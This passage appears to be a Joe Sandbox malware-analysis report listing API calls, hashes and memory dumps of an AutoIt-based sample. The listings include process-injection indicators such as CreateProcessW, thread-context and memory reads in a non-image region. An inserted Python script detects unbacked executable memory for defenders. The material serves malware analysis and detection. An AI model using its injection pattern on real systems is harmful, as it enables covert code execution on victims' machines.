  • Part of subcall function 0091336C: __lock.LIBCMT ref: 00913372
  • Part of subcall function 0091336C: DecodePointer.KERNEL32(00000001,?,008F4849,00947C74), ref: 0091337E
  • Part of subcall function 0091336C: EncodePointer.KERNEL32(?,?,008F4849,00947C74), ref: 00913389
  • Part of subcall function 008F48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008F4915
  • Part of subcall function 008F48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F492A
  • Part of subcall function 008F3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008F3B68
  • Part of subcall function 008F3B3A: IsDebuggerPresent.KERNEL32 ref: 008F3B7A
  • Part of subcall function 008F3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009B52F8,009B52E0,?,?), ref: 008F3BEB
  • Part of subcall function 008F3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 008F3C6F
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008F4874
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
• String ID:
• API String ID: 1438897964-0
APIs
  • Part of subcall function 0091571C: __FF_MSGBANNER.LIBCMT ref: 00915733
  • Part of subcall function 0091571C: __NMSG_WRITE.LIBCMT ref: 0091573A
  • Part of subcall function 0091571C: RtlAllocateHeap.NTDLL(01380000,00000000,00000001,00000000,?,?,?,00910DD3,?), ref: 0091575F
• std::exception::exception.LIBCMT ref: 00910DEC
• __CxxThrowException@8.LIBCMT ref: 00910E01
  • Part of subcall function 0091859B: RaiseException.KERNEL32(?,?,?,009A9E78,00000000,?,?,?,?,00910E06,?,009A9E78,?,00000001), ref: 009185F0
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
APIs
  • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
• __lock_file.LIBCMT ref: 009153EB
  • Part of subcall function 00916C11: __lock.LIBCMT ref: 00916C34
• __fclose_nolock.LIBCMT ref: 009153F6
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 014148BB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01414951
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01414973
Memory Dump Source
• Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
• Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: e098fd6dbc8aa8506dd1cf5352f3a16fe0e6934491802fa231f883026ea847a5
                                                                  • Instruction ID: 74c311d79d597a8cd290a12701add7aec5c6a87cbaeab55dab7bb7233360fffd
                                                                  • Opcode Fuzzy Hash: e098fd6dbc8aa8506dd1cf5352f3a16fe0e6934491802fa231f883026ea847a5
                                                                  • Instruction Fuzzy Hash: 20411A746043558FDB14DF24C454B2ABBE1FF85314F19886CE9998B362C736E845CF52
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 67aa3927cbfe37232aac24c20e0921b929b853f65387be4fe327bee5ed696e2a
                                                                  • Instruction ID: be126109ea2f16bf065a4f079bbbd6f583e76966d27790f4ad608f9cf1ea1f50
                                                                  • Opcode Fuzzy Hash: 67aa3927cbfe37232aac24c20e0921b929b853f65387be4fe327bee5ed696e2a
                                                                  • Instruction Fuzzy Hash: F2212472A18A1DEBEB109F61F8817A97BB4FF55360F21846EE58AC51A4EB3080D0D781
                                                                  APIs
                                                                    • Part of subcall function 008F4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 008F4BEF
                                                                    • Part of subcall function 0091525B: __wfsopen.LIBCMT ref: 00915266
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4E0F
                                                                    • Part of subcall function 008F4B6A: FreeLibrary.KERNEL32(00000000), ref: 008F4BA4
                                                                    • Part of subcall function 008F4C70: _memmove.LIBCMT ref: 008F4CBA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                  • String ID:
                                                                  • API String ID: 1396898556-0
                                                                  • Opcode ID: b6794aefa886d00fbdddd172ac047cae4295f1759f455377bfc47325126d7ab5
                                                                  • Instruction ID: 27638aaab589bf1d8380377ce5e4eb9e53a9aaec8b1ccda362b1f386b86e407f
                                                                  • Opcode Fuzzy Hash: b6794aefa886d00fbdddd172ac047cae4295f1759f455377bfc47325126d7ab5
                                                                  • Instruction Fuzzy Hash: 1D11EB3260420DABCF10EF74C812FBF77A8FF84720F10842AF645E7192EA7199149751
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 2077436cb29ebfe2fa60866d2830bd04020d59757e08a27c26199df414434b58
                                                                  • Instruction ID: f1998851631ef04758eb634a610b8d690bad1dc39f9e3c91b2ef085b4b6e0b04
                                                                  • Opcode Fuzzy Hash: 2077436cb29ebfe2fa60866d2830bd04020d59757e08a27c26199df414434b58
                                                                  • Instruction Fuzzy Hash: D42104B4608309DFCB14DF64C454B2ABBE0BF88314F058968E98997761D731E855CB92
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 009148A6
                                                                    • Part of subcall function 00918B28: __getptd_noexit.LIBCMT ref: 00918B28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: 97e7e0aad9c98a75cc39ea47ca153f3f8dc99f63a6f553cc3adae7831187ec20
                                                                  • Instruction ID: 2a1e33f5c2227d48996c8eb661a9d7f6b264ec1e32ff5e43c545cf0fb0f417f0
                                                                  • Opcode Fuzzy Hash: 97e7e0aad9c98a75cc39ea47ca153f3f8dc99f63a6f553cc3adae7831187ec20
                                                                  • Instruction Fuzzy Hash: 26F02D31B0020CEBDF11AFB0CC063EF36A4AF85325F108444F420AA1C1CBB88AD2EB91
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,009B52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 008F4E7E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: ae176055d5b718bb5b1f7d41ca4647e41666441861d7fddae229dd17464cb81b
                                                                  • Instruction ID: 62776c7d6f861dbde9454addf45d4aa01c1ec1bd877c4c94f09badf7f2a5e0b9
                                                                  • Opcode Fuzzy Hash: ae176055d5b718bb5b1f7d41ca4647e41666441861d7fddae229dd17464cb81b
                                                                  • Instruction Fuzzy Hash: DCF0F871515719CFCB349F74D494823B7E1FB54339320992EE2E6C2610C732A880DB40
                                                                  APIs
                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009107B0
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_memmove
                                                                  • String ID:
                                                                  • API String ID: 2514874351-0
                                                                  • Opcode ID: 7c4d2a37497ac7f8906751d82c20e111adeaeb44e18073b49cf4ceb43c0e153b
                                                                  • Instruction ID: 4f17a1da771a70b167ddb1a2417f9807448f0813d10fdfc0eb1ea46aae969965
                                                                  • Opcode Fuzzy Hash: 7c4d2a37497ac7f8906751d82c20e111adeaeb44e18073b49cf4ceb43c0e153b
                                                                  • Instruction Fuzzy Hash: 5CE0863790412857C7209668AC05FEA779DDB897A0F0441B5FD0CD7219D9609C908691
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __wfsopen
                                                                  • String ID:
                                                                  • API String ID: 197181222-0
                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction ID: e07bd38997252cce0e52722071695cd99962f90017e2ac86ff5bdbabf7994bf1
                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction Fuzzy Hash: 85B0927A54020CB7CE012A82EC02B893B199B91764F418020FB1C18172A677A6A49A89
                                                                  APIs
                                                                  • Sleep.KERNELBASE(000001F4), ref: 01415111
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1285208597.0000000001412000.00000040.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1412000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction ID: b41343dc8d8c7aa274c9f5833440465955d5ec25d62a6e0828f5a9ef302349a3
                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                  • Instruction Fuzzy Hash: 53E0E67494010DEFDB00EFF4D6496EE7FB4EF04301F100161FD01D2281D6309D508A62
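The Sleep call listed above is the only one in this section that sits in a dump region the report marks "based on PE: false" (snapshot at offset 01412000), that is, code executing from memory that is not backed by a loaded image, which is what unpacked or injected payload code looks like. The check a practitioner runs on a live host for the same condition is to walk the target's address space and flag committed, executable memory that does not belong to a MEM_IMAGE mapping. The following is an added example and is not part of the Joe Sandbox report or its tooling: the classification is pure Python and runs anywhere; the live scan (enumerate_regions) needs Windows and calls kernel32!VirtualQueryEx through ctypes. The sample regions are constructed from the two base addresses in this report (008F0000 and 01412000); their state, protection and type values are assumed for illustration, not read from the report.

```python
"""Flag committed, executable memory that is not backed by a PE image.

Added example, not Joe Sandbox code. Classification works offline; the
live scan needs Windows (kernel32!OpenProcess / VirtualQueryEx via ctypes).
"""
import ctypes
import sys
from dataclasses import dataclass

# Memory constants from winnt.h
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
PAGE_READONLY = 0x02
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
PAGE_GUARD = 0x100
EXEC_MASK = (PAGE_EXECUTE | PAGE_EXECUTE_READ
             | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_VM_READ = 0x0010


@dataclass(frozen=True)
class Region:
    base: int
    size: int
    state: int
    protect: int
    type: int


def is_unbacked_executable(r: Region) -> bool:
    """True for committed, executable memory outside any image mapping."""
    if r.state != MEM_COMMIT:          # reserved / free: nothing runs there
        return False
    if r.protect & PAGE_GUARD:         # guard pages fault on touch; not code
        return False
    if not (r.protect & EXEC_MASK):    # not executable at all
        return False
    return r.type != MEM_IMAGE         # image-backed code is the loader's job


def suspicious_regions(regions) -> list:
    """Filter an iterable of Region objects down to the unbacked executable ones."""
    return [r for r in regions if is_unbacked_executable(r)]


# Layout of MEMORY_BASIC_INFORMATION; ctypes aligns RegionSize to pointer
# size, so the x64 PartitionId/padding field needs no explicit entry.
class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [
        ("BaseAddress", ctypes.c_void_p),
        ("AllocationBase", ctypes.c_void_p),
        ("AllocationProtect", ctypes.c_uint32),
        ("RegionSize", ctypes.c_size_t),
        ("State", ctypes.c_uint32),
        ("Protect", ctypes.c_uint32),
        ("Type", ctypes.c_uint32),
    ]


def enumerate_regions(pid: int):
    """Walk a process's address space with VirtualQueryEx (Windows only)."""
    if sys.platform != "win32":
        raise RuntimeError("live scan requires Windows")
    k32 = ctypes.WinDLL("kernel32", use_last_error=True)
    k32.OpenProcess.argtypes = [ctypes.c_uint32, ctypes.c_int, ctypes.c_uint32]
    k32.OpenProcess.restype = ctypes.c_void_p
    k32.VirtualQueryEx.argtypes = [ctypes.c_void_p, ctypes.c_void_p,
                                   ctypes.POINTER(MEMORY_BASIC_INFORMATION),
                                   ctypes.c_size_t]
    k32.VirtualQueryEx.restype = ctypes.c_size_t
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    h = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, 0, pid)
    if not h:
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        addr = 0
        mbi = MEMORY_BASIC_INFORMATION()
        # VirtualQueryEx returns 0 once addr passes the end of user space.
        while k32.VirtualQueryEx(h, ctypes.c_void_p(addr), ctypes.byref(mbi),
                                 ctypes.sizeof(mbi)):
            base = mbi.BaseAddress or 0
            yield Region(base, mbi.RegionSize, mbi.State, mbi.Protect, mbi.Type)
            addr = base + mbi.RegionSize
    finally:
        k32.CloseHandle(h)


# Constructed sample mirroring the two dump sources in this report: the host
# image at 008F0000 (based on PE: true) and the region at 01412000 (based on
# PE: false). State/protect/type values are assumed, not taken from the report.
SAMPLE_REGIONS = [
    Region(0x008F0000, 0x1000, MEM_COMMIT, PAGE_READONLY, MEM_IMAGE),
    Region(0x008F1000, 0x8E000, MEM_COMMIT, PAGE_EXECUTE_READ, MEM_IMAGE),
    Region(0x01412000, 0x6000, MEM_COMMIT, PAGE_EXECUTE_READWRITE, MEM_PRIVATE),
    Region(0x7FFE0000, 0x1000, MEM_COMMIT, PAGE_READONLY, MEM_PRIVATE),
]

if __name__ == "__main__":
    # With a PID argument (Windows) scan that process; otherwise use the sample.
    regions = (list(enumerate_regions(int(sys.argv[1])))
               if len(sys.argv) > 1 else SAMPLE_REGIONS)
    for r in suspicious_regions(regions):
        print(f"{r.base:#010x} size={r.size:#x} protect={r.protect:#x} "
              f"type={r.type:#x}")
```

Run it without arguments to see the constructed 01412000 region flagged and the image-backed 008F1000 code region passed over; on Windows, pass a PID to scan a live process. Treat hits as triage leads rather than verdicts: JIT runtimes and some legitimate loaders also leave private executable pages, so the next step is to dump the flagged region and look for a PE header or known payload code, which is what the report's non-PE dump at 01412000 represents.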
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0097CB37
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097CB95
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097CBD6
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0097CC00
                                                                  • SendMessageW.USER32 ref: 0097CC29
                                                                  • _wcsncpy.LIBCMT ref: 0097CC95
                                                                  • GetKeyState.USER32(00000011), ref: 0097CCB6
                                                                  • GetKeyState.USER32(00000009), ref: 0097CCC3
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0097CCD9
                                                                  • GetKeyState.USER32(00000010), ref: 0097CCE3
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0097CD0C
                                                                  • SendMessageW.USER32 ref: 0097CD33
                                                                  • SendMessageW.USER32(?,00001030,?,0097B348), ref: 0097CE37
                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0097CE4D
                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0097CE60
                                                                  • SetCapture.USER32(?), ref: 0097CE69
                                                                  • ClientToScreen.USER32(?,?), ref: 0097CECE
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0097CEDB
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0097CEF5
                                                                  • ReleaseCapture.USER32 ref: 0097CF00
                                                                  • GetCursorPos.USER32(?), ref: 0097CF3A
                                                                  • ScreenToClient.USER32(?,?), ref: 0097CF47
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0097CFA3
                                                                  • SendMessageW.USER32 ref: 0097CFD1
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0097D00E
                                                                  • SendMessageW.USER32 ref: 0097D03D
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0097D05E
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0097D06D
                                                                  • GetCursorPos.USER32(?), ref: 0097D08D
                                                                  • ScreenToClient.USER32(?,?), ref: 0097D09A
                                                                  • GetParent.USER32(?), ref: 0097D0BA
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0097D123
                                                                  • SendMessageW.USER32 ref: 0097D154
                                                                  • ClientToScreen.USER32(?,?), ref: 0097D1B2
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0097D1E2
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0097D20C
                                                                  • SendMessageW.USER32 ref: 0097D22F
                                                                  • ClientToScreen.USER32(?,?), ref: 0097D281
                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0097D2B5
                                                                    • Part of subcall function 008F25DB: GetWindowLongW.USER32(?,000000EB), ref: 008F25EC
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097D351
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F
                                                                  • API String ID: 3977979337-4164748364
                                                                  • Opcode ID: 0fe559ef2bb9470586957f4e0b20e1ceefc56e8a818bb546b930f29724b834ce
                                                                  • Instruction ID: d08d25bf0fdfde34318f09ff05bef27d326b0c758f741a0e020fdfeea3658059
                                                                  • Opcode Fuzzy Hash: 0fe559ef2bb9470586957f4e0b20e1ceefc56e8a818bb546b930f29724b834ce
                                                                  • Instruction Fuzzy Hash: 9F42BFB6208241AFD721CF64D885BAABBE9FF49710F144A1DF699D72B0C731D840EB52
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_memset
